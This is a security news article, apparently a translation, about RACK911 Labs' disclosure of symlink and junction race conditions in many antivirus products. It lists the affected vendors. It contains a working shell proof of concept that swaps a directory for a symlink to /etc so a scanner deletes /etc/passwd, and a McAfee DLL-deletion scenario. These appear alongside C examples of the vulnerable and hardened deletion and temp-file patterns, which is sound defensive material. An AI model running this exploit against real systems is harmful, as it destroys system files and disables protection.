Attack on most antiviruses via symbolic links

Researchers at RACK911 Labs found that almost every antivirus package for Windows, Linux and macOS was vulnerable to attacks that exploit a race condition during the deletion of files in which malware has been detected.

To carry out the attack, you upload a file that the antivirus recognises as malicious (a test signature such as EICAR will do), and then, after the antivirus has detected the malicious file but immediately before it calls the function that deletes it, you replace the directory containing the file with a symbolic link. On Windows the same effect is achieved by swapping the directory for a directory junction. The problem is that almost none of the antiviruses checked for symbolic links properly: believing they were deleting the malicious file, they instead deleted the file of the same name in the directory the symbolic link points to.

On Linux and macOS it was shown how an unprivileged user can use this to delete /etc/passwd or any other system file, and on Windows to delete the antivirus's own DLL and thereby break it (on Windows the attack is limited to deleting files that are not currently in use by another application). For example, an attacker could create an "exploit" directory and upload into it a file named EpSecApiLib.dll carrying the antivirus test signature, then, just before the deletion, replace the "exploit" directory with a symbolic link to "C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform", which results in the EpSecApiLib.dll library being removed from the antivirus's own directory. On Linux and macOS the same trick works by replacing the directory with a link to "/etc". The proof-of-concept script below plants an EICAR file named "passwd", waits for the scanner to open it, and then swaps the directory for a symlink to /etc so that the scanner's deletion lands on /etc/passwd:

#!/bin/sh
# Plant a file carrying the EICAR test signature under the name "passwd".
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
# inotifywait reports every open of the planted file; the OPEN events are the
# scanner reading it, i.e. the window between detection and deletion.
while inotifywait -m "/home/user/exploit/passwd" | grep -m 5 "OPEN"
do
    # Swap the directory for a symlink so "/home/user/exploit/passwd" now
    # resolves to /etc/passwd when the scanner deletes by path.
    rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
done
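The same race replayed in a scratch directory, as an added example that is not code from the RACK911 report or from any of the affected products. It puts a by-path deletion (the pattern the report describes) next to the hardened form a practitioner would want: reopen the parent directory with O_NOFOLLOW, compare its device/inode with what was recorded at detection time, confirm the leaf is a regular file, and unlink relative to the held directory descriptor. All names here (simulate, naive_delete, hardened_delete, the "exploit" and "victim" directories, with "victim/passwd" standing in for /etc/passwd) are this example's own, and the scratch directory is created under /tmp, or the working directory if /tmp is not writable.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Identity (device + inode) of the directory the scanner saw at detection time. */
struct dir_id { dev_t dev; ino_t ino; };

/* Record a directory's identity without following a symlink at its leaf. */
static int record_dir_id(const char *dir, struct dir_id *id) {
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0) return -1;
    struct stat st;
    int r = fstat(dfd, &st);
    close(dfd);
    if (r < 0) return -1;
    id->dev = st.st_dev;
    id->ino = st.st_ino;
    return 0;
}

/* Vulnerable pattern: delete by path. Every component, including the parent
 * directory, is resolved again at unlink time, so a symlink swapped in after
 * detection redirects the deletion wherever the attacker pointed it. */
static int naive_delete(const char *dir, const char *name) {
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/%s", dir, name);
    return unlink(path);
}

/* Hardened pattern: reopen the parent with O_NOFOLLOW, check it is still the
 * directory seen at detection time, check the leaf is a regular file rather than
 * a symlink, then unlink relative to the directory descriptor we are holding. */
static int hardened_delete(const char *dir, const char *name, const struct dir_id *seen) {
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0) return -1;                           /* ELOOP: parent is now a symlink */
    struct stat st;
    if (fstat(dfd, &st) < 0 || st.st_dev != seen->dev || st.st_ino != seen->ino) {
        close(dfd);
        errno = EXDEV;                                /* parent was replaced */
        return -1;
    }
    if (fstatat(dfd, name, &st, AT_SYMLINK_NOFOLLOW) < 0 || !S_ISREG(st.st_mode)) {
        close(dfd);
        errno = EPERM;                                /* leaf missing or not a plain file */
        return -1;
    }
    int r = unlinkat(dfd, name, 0);
    close(dfd);
    return r;
}

static int touch(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

struct outcome { int planted_gone; int victim_gone; };

/* Replay the race: <base>/exploit/passwd is the planted file, <base>/victim/passwd
 * stands in for /etc/passwd. attacker_wins=1 performs the directory swap between
 * detection and deletion. Returns 0 and fills *out, or -1 on setup failure. */
static int simulate(int attacker_wins, int use_hardened, struct outcome *out) {
    char base[] = "/tmp/av-race-XXXXXX";
    if (!mkdtemp(base)) { strcpy(base, "av-race-XXXXXX"); if (!mkdtemp(base)) return -1; }
    char exploit[PATH_MAX], victim[PATH_MAX], planted[PATH_MAX], target[PATH_MAX];
    snprintf(exploit, sizeof exploit, "%s/exploit", base);
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(planted, sizeof planted, "%s/passwd", exploit);
    snprintf(target, sizeof target, "%s/passwd", victim);
    if (mkdir(exploit, 0700) || mkdir(victim, 0700) || touch(planted) || touch(target)) return -1;

    struct dir_id seen;                               /* 1. scanner detects the planted file */
    if (record_dir_id(exploit, &seen)) return -1;
    if (attacker_wins) {                              /* 2. "rm -rf exploit; ln -s victim exploit" */
        unlink(planted);
        rmdir(exploit);
        if (symlink(victim, exploit)) return -1;
    }
    if (use_hardened) hardened_delete(exploit, "passwd", &seen);   /* 3. scanner deletes */
    else naive_delete(exploit, "passwd");

    out->planted_gone = access(planted, F_OK) != 0;
    out->victim_gone = access(target, F_OK) != 0;
    /* cleanup, ignoring whatever is already gone */
    unlink(planted); rmdir(exploit); unlink(exploit); unlink(target); rmdir(victim); rmdir(base);
    return 0;
}

int main(void) {
    struct outcome o;
    if (simulate(1, 0, &o) == 0) printf("naive delete, attacker wins: victim %s\n", o.victim_gone ? "destroyed" : "intact");
    if (simulate(1, 1, &o) == 0) printf("hardened delete, attacker wins: victim %s\n", o.victim_gone ? "destroyed" : "intact");
    if (simulate(0, 1, &o) == 0) printf("hardened delete, no race: planted file %s\n", o.planted_gone ? "removed" : "still there");
    return 0;
}
```

The inode comparison is what closes the window: O_NOFOLLOW alone only rejects a symlink at the leaf, while the check against the identity recorded at detection time also catches a parent that was renamed or bind-mounted away. On Windows the equivalent is opening the directory with FILE_FLAG_OPEN_REPARSE_POINT and refusing junctions before deleting relative to that handle.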
In addition, many antiviruses for Linux and macOS were found to use predictable file names when working with temporary files in the /tmp and /private/tmp directories, which can be used to escalate privileges to root: an unprivileged user who can predict the name plants a symbolic link there ahead of time, and the privileged scanner follows it when it creates and writes the file.
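The predictable temporary-name problem, shown as an added example that is not code from the report or from any affected product. A privileged writer that opens a fixed name under the temporary directory with O_CREAT|O_TRUNC follows a link the attacker planted there first, truncating and overwriting the link's target; the same writer using mkstemp, which creates an unpredictable name atomically with O_EXCL, never touches the planted link. The names simulate_tmp_race, write_scratch_predictable, write_scratch_mkstemp and the "ld.so.preload" stand-in target are this example's own assumptions, and the scratch directory goes under /tmp or the working directory.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: fixed, guessable name opened with O_CREAT|O_TRUNC. If the
 * name already exists as a symlink, open() follows it and truncates the target. */
static int write_scratch_predictable(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened pattern: mkstemp picks a random suffix and creates the file with
 * O_CREAT|O_EXCL, so an existing entry (including a planted link) is never opened.
 * The chosen path is left in 'out' so the caller can remove it later. */
static int write_scratch_mkstemp(const char *tmpdir, const char *data, char *out, size_t outlen) {
    snprintf(out, outlen, "%s/avscan.XXXXXX", tmpdir);
    int fd = mkstemp(out);
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Attacker plants <base>/avscan.tmp -> <base>/ld.so.preload (stand-in for a
 * root-owned file), then the scanner writes its scratch data.
 * Returns 1 if the target was overwritten, 0 if untouched, -1 on setup error. */
static int simulate_tmp_race(int use_mkstemp) {
    char base[] = "/tmp/av-tmp-XXXXXX";
    if (!mkdtemp(base)) { strcpy(base, "av-tmp-XXXXXX"); if (!mkdtemp(base)) return -1; }
    char target[PATH_MAX], planted[PATH_MAX], made[PATH_MAX] = "";
    snprintf(target, sizeof target, "%s/ld.so.preload", base);
    snprintf(planted, sizeof planted, "%s/avscan.tmp", base);

    FILE *f = fopen(target, "w");                    /* target with known content */
    if (!f) return -1;
    fputs("original\n", f);
    fclose(f);
    if (symlink(target, planted)) return -1;          /* attacker's pre-planted link */

    const char *scratch = "scanner scratch data\n";
    if (use_mkstemp) write_scratch_mkstemp(base, scratch, made, sizeof made);
    else write_scratch_predictable(planted, scratch);

    char buf[64] = "";
    f = fopen(target, "r");
    if (f) { if (!fgets(buf, sizeof buf, f)) buf[0] = '\0'; fclose(f); }
    int overwritten = strcmp(buf, "original\n") != 0;

    unlink(planted); if (made[0]) unlink(made); unlink(target); rmdir(base);
    return overwritten;
}

int main(void) {
    printf("fixed name:  target %s\n", simulate_tmp_race(0) == 1 ? "overwritten" : "intact");
    printf("mkstemp:     target %s\n", simulate_tmp_race(1) == 1 ? "overwritten" : "intact");
    return 0;
}
```

Keeping the fixed name but opening it with O_CREAT|O_EXCL|O_NOFOLLOW also fails closed, but then the attacker can deny service by keeping the name occupied; an unpredictable name, or a per-user directory created with restrictive permissions, avoids both outcomes.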

By now most vendors have already fixed the problems, but it is notable that the first notification of the problem was sent to the manufacturers in autumn 2018. Although not all vendors have released updates, they were given at least six months to patch, and RACK911 Labs considers it is now free to disclose the vulnerabilities. RACK911 Labs notes that it has been finding vulnerabilities for a long time, but did not expect it to be so hard to work with colleagues in the antivirus industry, given the delays in releasing updates and the disregard for the need to fix security problems urgently.

Affected products (the free antivirus package ClamAV is not on the list):

  • Linux
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • Eset File Server Security
    • F-Secure Linux Security
    • Kaspersky Endpoint Security
    • McAfee Endpoint Security
    • Sophos Anti-Virus for Linux
  • Windows
    • Avast Free Anti-Virus
    • Avira Free Anti-Virus
    • BitDefender GravityZone
    • Comodo Endpoint Security
    • F-Secure Computer Protection
    • FireEye Endpoint Security
    • Intercept X (Sophos)
    • Kaspersky Endpoint Security
    • Malwarebytes for Windows
    • McAfee Endpoint Security
    • Panda Dome
    • Webroot Secure Anywhere
  • macOS
    • AVG
    • BitDefender Total Security
    • Eset Cyber Security
    • Kaspersky Internet Security
    • McAfee Total Protection
    • Microsoft Defender (BETA)
    • Norton Security
    • Sophos Home
    • Webroot Secure Anywhere

    source: budenet.ru
